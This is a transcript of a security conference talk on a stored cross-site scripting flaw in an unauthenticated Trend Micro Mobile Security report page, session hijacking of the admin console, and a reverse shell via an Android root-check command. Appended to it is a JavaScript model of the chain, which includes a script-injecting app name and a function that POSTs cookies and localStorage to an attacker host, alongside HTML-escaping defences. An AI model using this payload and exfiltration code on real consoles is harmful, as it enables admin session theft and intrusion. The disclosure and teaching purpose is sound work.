
Alright, ladies and gentlemen, please put your hands together for Lucas. He will be our next speaker.

Hi guys. First of all, I need to say some things. I am still learning English. I've learned everything by myself, so sorry about the accent. But I think the message will be the most important part. And just to clarify the expectations of this talk: we will cover things with a focus on vulnerability research, zero-day hunting, issues that will help people who do things like red teaming or APT-style operations. Feel free to reach out to me after this talk; it will be my pleasure to chat with everybody.

On the technical side of this talk, I will talk about an information disclosure that doesn't require authentication, and in this information disclosure page we found one stored cross-site scripting. With this cross-site scripting, we got a proof of concept where one user could get the key to join any agent to the Trend Micro console. We'll also cover a potential bug that could lead to command execution on the Android client side. So I think this clarifies some things. And please be patient with my accent and with my English. But yeah, that's it. Here we have some letters; it's me. I think this is not so important to this talk, so if you guys need to reach out to me or something like that, you can take a picture or something like this. And let's go with the important things.

Why Trend Micro Mobile Security? To me, this platform was very important because I met one guy, his name is Oliveira Lima, and he became like a father figure to me. I was in a bad situation in life, and when I met him, he started to teach me cybersecurity, offensive security in particular. When I met him, I also saw that one thing that made him proud was the Trend Micro Hall of Fame. So I started thinking, when one day I have the skills,
I think this will be one thing to make him proud of after all these years.

Talking about the market aspect: security tools must be tested too, principally because companies have these tools, and if you get some zero-days, some issue that could get you in, you get a level of privilege that maybe other tools don't have, because security tools need to handle traffic and need to understand various layers of data. So this is something that researchers need to look for in zero-day research and things like that. And we also wanted a challenge, because, you know, for an enterprise focused on antivirus, I think the level of security will be higher. So with this challenge, we get some data that we could improve on, and, basically, our result.

And yeah, this is the Trend Micro Hall of Fame. Oliveira Lima was in it in 2017, I think that's the year. This was when I met him. And talking about the impact on the market: when we look in the Google Play Store, we see this number. So there are very many users around the world, and companies are using Enterprise Mobile Security, which is the APK that we use to connect to the Trend Micro console, and on the business page we can also see the numbers of companies and the segments of industry that work with Trend Micro.

This was the email of my report. Trend Micro took some time to reply to this and also to fix the issue, because the issues are in particular in various Trend Micro applications, including the XDR; I think the name is Vision One. And this took some time to get fixed. So after this approach by email, following the responsible disclosure approach, I'm going to tell you guys all the technical aspects of these findings.

So how did I get these issues, the approaches? I think vulnerability research is like an artistic thing, because you have something like the abstract, and if you have some approaches and things that you can think of and get the puzzle done, you get a really beautiful result, one piece of art, where maybe you can chain sometimes four, five, six vulnerabilities and get one Mona Lisa of a cybersecurity exploit.

And starting with this, before I could get to the dynamic analysis, I had in front of me, I was looking, and in front of me I searched and found one SSL pinning and one anti-tamper check. I will not focus on explaining how these work, but on how I found these brushes, because I think on the internet you guys can already search how to bypass SSL pinning and anti-tampering. But the mind behind this, the process behind this, the flow, I think this will not be on the internet. So this is the thing that I want to show you guys, regarding the SSL pinning.
Here are all the packages and classes that I found, and the method that I needed to patch to avoid this client-side protection in order to do the dynamic analysis.

So this is the code of the anti-tamper. And if you guys can see, just out of curiosity, on line 592, this is the hash of the APK. In the condition, if the APK does not match this hash, it means the APK was modified and has a new hash, so the agent will not let the user open the APK. When we edit this, I basically removed everything and made it return the constant every time, false or true. So when this condition comes, the Boolean true will be returned every time, saying that the MD5 is right, and we get into the application.

So with no problems with the dynamic analysis in hand, I started with my brushes, and the brushes are very important, because I think everyone says that the recon part is one of the most important things. And in vulnerability research it is also true that it's the most important thing, because you need to deal with a lot of reverse engineering and things that maybe don't have information exposed on the internet. So you need time, you need to pay attention, and create some approaches to not get lost, because there are big, big, big things, like giant lines of code, like maybe exposed documentation, PDFs teaching how administrators can use the platform. So this takes time, and with this time, when you know how the application works, you can get some insights into how you can change the execution flow or find some things that were not expected by the developers.

So yeah, the key points of this finding are that this report page is unauthenticated, so everyone that has this name, MDM web repository, report, manual output, security scan report, will get into this page. You just need to change the IP address and you will get reports of all the agents, all the metadata that agents are sending to the console. So this is the report page of the administration view. You can also generate the report and also schedule it. So in big, giant companies, giant enterprises, this report has very, very good information, because the only problem here is that the data that is returned is focused on a top 10, because all the information is returned in charts. So we can only get some clues about the top 10 information data that is coming out of the console. So we have here all types of report: the security report, device inventory report, compliance violation report, application inventory report, device enrollment report, and device unenrollment report. The information is here in the screenshot, but we don't have some things that are interesting right now.
But moving forward, when I was telling you guys about the brushes: to me, vulnerability research is an artistic way of seeing hacking. So the process is very important. In one page that maybe doesn't represent some risk, I think if you go searching and looking deeply, you can maybe find some things that will make your first vulnerability more and more valuable. This is a clue: if the page is already unauthenticated, maybe the developers have forgotten something, forgot to maybe sanitize some characters or things like that. And I started to think, how can I get this? How can I make this table with data, where does this data come from? And with this thinking I got into the agent, and because of this it was needed to bypass the client-side protections, because I needed to put the communication through a proxy to watch the traffic and maybe modify the metadata of the Android device and send it to the console. So if everything goes right, the console will render the things that I am sending and maybe we can get some vulnerability.

And in this case, I researched so many types of injection in this page, but the JavaScript injection was the only one that I got triggered. But this cross-site scripting was one interesting stored cross-site scripting, because this page is unauthenticated, and in the exploitation part of the chain, we could get some proof of concept that we could get into the administration console with the privileges of the admin. We also got the enroll key. So cross-site scripting is based on the hacker's operation. I think this is a type of attack that has many and various ways to be applied in one operation or in one APT focused on a company or an enterprise that is using Trend Micro.

Yeah. So the key points here are: the Android agent sends metadata, including the app name, to the server. So the parameter that was vulnerable is the app name in the request. And one thing that is cool: if you guys create some APK with a name that has the payload, when the console starts to scan everything, it will literally get this new APK with the name that contains the payload, and it will trigger again, because the app name will be rendered in the device inventory report, and you don't need to send a properly crafted request or something like that. You could automate this action to get an operation that is more silent and, I think, more accurate. And the name is deployed in the report without sanitization or any type of protection. It allows persistent JavaScript injection in a page rendered for admins and users. The stored cross-site scripting is delivered via the same unauthenticated report endpoint. It works across browsers; no special payload is needed for execution. Exploitation occurs without user interaction; you just need to enter this page and the payload will be triggered. And yeah, this cross-site scripting can be used to do various, various types of attacks, different attacks.

This was the request and the payload used. Oh, all right. It's good to see. Woohoo! But yeah, we have here the request. We can see here the endpoint that was affected, and here the payload that I used. And in the console part, we got here the device tab. And when I come to the user ID of my device, here I can see the names of the installed applications that were scanned from my phone. And we also get here the payload that I used. After this, I go to the application inventory report and generate a new report, or, in the case of a real-world attack scenario, I think the most appropriate way would be to wait for the schedule to run and get the new report. And here we got the simple alert, just to see the JavaScript working.

This explanation here, I will show one simple video to show it better, because I know that I need to improve my conversation. But I think with the video it will be easier. So yeah, here I am changing the app name. But you guys can automate this in various ways, like using one APK that you guys have created, maybe using one Frida script embedded in another APK, generating the report. And when we check it out, we get the simple alert just to... Thank you. Thank you. And one thing just to show is that it doesn't need authentication. So everyone that accesses this page will trigger this cross-site scripting. Yeah. Showing that I am really not logged in. Okay.

So yeah, we have this entry point. So at Hakai Security we have a mindset that we always go deeper every time we can, because we train our mindset, we learn everything, every time, and we want to get closer to a real attacker. So in our vulnerability research, in our security research, we always focus on this part, to get closer to these threats. So I was thinking about one scenario for this talk, one classical way, you know, to get more out of cross-site scripting, a better version of the cross-site scripting, like an upgraded version, which is session hijacking. But obviously, based on your red teaming operation, your APT or something like that, you can always choose your way, because once you have control of the client-side user, you can basically do anything that your mindset and your brain can come up with. So yeah, to show this, I have done one JS exploit. I don't know if you guys can see, but I will... one second. All right. I will go a bit faster for you guys. I think now it's better to see. But it is not complex. There is not anything hard.
It's getting the local storage to avoid problems with the CSRF token, and our goal is to get the cookies to manipulate and interact with the console. So I have done here the exploit to already log in and make a POST to my web server, with the communication using the fetch object to avoid problems with CORS also. So here we basically have the reading of the cookies and the reading of the local storage to get the value of the CSRF token and all the particular headers that are needed to communicate with the console after we get the tokens needed.

Yeah. So, keep going. This was the... sorry, guys, just to get a better view for you guys. But this is the code of the web server, a simple code too, created to avoid problems and get more debuggable, verbose information to understand what we are doing. So here we have our configuration, of course, to avoid problems again, our self path with the slash log, sorry for the Portuguese, the slash log, and the content length and the information that we are exfiltrating from the user that is accessing this page.

So this was the final payload. It's a simple payload. I just needed to break the first tag, and after this I created my script tag with the source pointing to my IP address with my JS exploit, the previous JS exploit that I was showing to you guys. And yeah, this was the result when the administrator accessed the report page, and we got on our VPS the cookies, like the session info, the deploy mode, the TMMS token, and this was used to authenticate to the console. And about privilege, I was saying that I already created one action that will make sure, with 100% accuracy, that we get the available token and we get access to the administration console.

So again, to make things easier, I think videos work very, very well. So here we have the attack, all of the attack of this proof of concept. I am right now just deleting the metadata of every application that was on my cell phone. Here is the affected endpoint and the affected parameter with the payload that I constructed. And now I am going to the console to see if everything is okay, and yeah, we have the payload. Now we just need to enter the report page, the application inventory report page, and you guys can already see nothing happens in the administration view, but in our console we got all the information that we could use to get into the console. So here we have the session info, we have the TMMS token, and below we have the request to the user endpoint to test if this session is available. Valid, yeah. And here we got the enroll key. So with a valid session, we just changed the values of the browser's local storage, and we can refresh the page and get into the administration dashboard page.

And moving forward to the command execution part. This vulnerability, this bug, unfortunately, is more specific. So the affected code I found in the Trend Micro Android-based ITU and device ITU class and package, on the line (the line will be changed), but in the method Boolean C, on line three, we have one getRuntime().exec(). In this particular line, when the application starts the scan, it looks at whether the Android agent or iPhone was rooted or jailbroken, and this was one of these verifications to know if the device has high privilege or things like that, because of the su binary. So it was a hard verification, because, as you guys will see, if someone has some knowledge about reverse engineering and creating exploits, maybe you will be hacked by this specifically, in just a single line of code. But it is harder because this is focused on the client side, so you need some scenarios to exploit this. But just to show what the problem is, if the attacker, the operator, has success in this scenario: here I am setting up my netcat and I will run Frida with the command execution exploit. The application will open, we will press scan, and here we got the connection of the reverse shell.
Yeah. So if you guys see, the attack vectors here are: memory-level execution, the view, the class and the package device, the class Device, and the method was C. App sideloading: the attack vector maybe could succeed with app sideloading, like using one APK with embedded code. Or maybe, if you have some courage, if you are not like me and have some anxiety, you can maybe try to steal one from the enterprise in one operation. And with this cell phone in hand, you can verify types of data and access that could help you to do lateral movement and maybe get more information and a better result for the final operation.

Unfortunately, the challenge was that I could not get this execution run by the console to understand how this... To get one reverse shell, you need also to understand the life cycle of the scan, because the malicious actions will only happen when the scan runs. So we have some cases here and some technical insights. But unfortunately, Trend Micro replied to me not considering it a vulnerability, because to exploit this code we need to create another APK or another type of interaction. And unfortunately, they did not approve it. But here we have the affected version, if you guys want to get some, you know, some adventure.

And yeah, at the beginning of the talk, I was saying Oliveira Lima was like a father to me and an inspiration. And I am so happy to make him proud to say that Trend Micro confirmed the other two vulnerabilities. And right now I am in the Trend Micro Hall of Fame. And this photo to me is very cool because it was my first time here in Vegas. And I am from Brazil, and in Brazil we do not have dispensaries. So yeah, I love these cookies in my heart. Yeah. So I was very, very happy. Viva America. And this was the timeline of the research. Next month, you guys will have the full article. The article, I promise you guys, I can write perfectly in English, but I learned everything by myself. So I need to practice more conversation, conversation, and I will get more shy, less shy, and yeah, always improving myself. Questions? Oh, time is over, but yeah. Thank you, guys. Thank you.
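As an added example (not code from the talk, and not Trend Micro's code), the stored cross-site scripting chain the speaker describes, modelled in Node.js: the report rendering that interpolates an agent-reported app name without escaping, beside an escaped version; the crafted app name itself; the exfiltration script that reads `document.cookie` and `localStorage` (where the talk says the CSRF token is kept) and POSTs them with `fetch`; and a check the console could apply when it ingests agent metadata. The report field names, the `/log` path, the `x.js` filename, the cookie and storage keys, and the attacker address 203.0.113.5 are assumptions for illustration, and the agent metadata is constructed, not captured.

```javascript
// Added example: model of the stored-XSS chain from the talk, not Trend Micro's code.
// Field names, paths and the attacker host 203.0.113.5 are assumptions.

// Constructed sample of the metadata an agent would report (not a real capture).
const SAMPLE_AGENT_METADATA = [
  { deviceId: 'device-001', appName: 'Calculator' },
  { deviceId: 'device-002', appName: 'Maps' },
];

// 1. Vulnerable rendering: the agent-supplied app name is interpolated straight into
//    the report HTML, which is what lets a crafted app name become a script tag.
function renderInventoryRowVulnerable(app) {
  return `<tr><td>${app.deviceId}</td><td>${app.appName}</td></tr>`;
}

// 2. Hardened rendering: HTML-escape every agent-controlled field before it reaches
//    the page. Escaping & < > " ' covers both element and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
function renderInventoryRowSafe(app) {
  return `<tr><td>${escapeHtml(app.deviceId)}</td><td>${escapeHtml(app.appName)}</td></tr>`;
}

// 3. Attacker side: an app name that closes the table cell and loads a script from the
//    attacker's host. An APK with this label, or a Frida hook in the agent, reports it.
function buildAppNamePayload(attackerHost) {
  return `</td><script src="http://${attackerHost}/x.js"></script><td>`;
}

// 4. What x.js does in the admin's browser: collect document.cookie plus every
//    localStorage entry and POST them out. `doc` and `storage` are passed in so the
//    collector can be exercised without a browser.
function collectSession(doc, storage) {
  const local = {};
  for (let i = 0; i < storage.length; i += 1) {
    const key = storage.key(i);
    local[key] = storage.getItem(key);
  }
  return { url: doc.location.href, cookies: doc.cookie, localStorage: local };
}

function exfiltrate(attackerHost, doc, storage, fetchImpl = globalThis.fetch) {
  const body = JSON.stringify(collectSession(doc, storage));
  // mode: 'no-cors' makes the browser send the request even though the attacker's
  // server answers without CORS headers; the opaque response does not matter here.
  return fetchImpl(`http://${attackerHost}/log`, {
    method: 'POST',
    mode: 'no-cors',
    headers: { 'Content-Type': 'text/plain' },
    body,
  });
}

// 5. Ingestion-side check the console could apply in addition to output escaping:
//    flag app names carrying markup characters so they never reach a report.
function looksLikeMarkup(appName) {
  return /[<>"'&]/.test(String(appName));
}

// Run the chain end to end against the constructed data.
function demo(attackerHost = '203.0.113.5') {
  const agents = [
    ...SAMPLE_AGENT_METADATA,
    { deviceId: 'device-003', appName: buildAppNamePayload(attackerHost) },
  ];
  return {
    vulnerableHtml: agents.map(renderInventoryRowVulnerable).join('\n'),
    safeHtml: agents.map(renderInventoryRowSafe).join('\n'),
    flagged: agents.filter((a) => looksLikeMarkup(a.appName)).map((a) => a.deviceId),
  };
}

console.log(demo().vulnerableHtml);
```

Run it with `node`; the vulnerable rows print a live `<script src="http://203.0.113.5/x.js">` tag where the third device's app name should be, while the escaped rows show the same bytes as text. The later step from the talk, replaying the captured cookies and local storage values in the attacker's own browser to land on the dashboard, is a manual action in developer tools and is not modelled here.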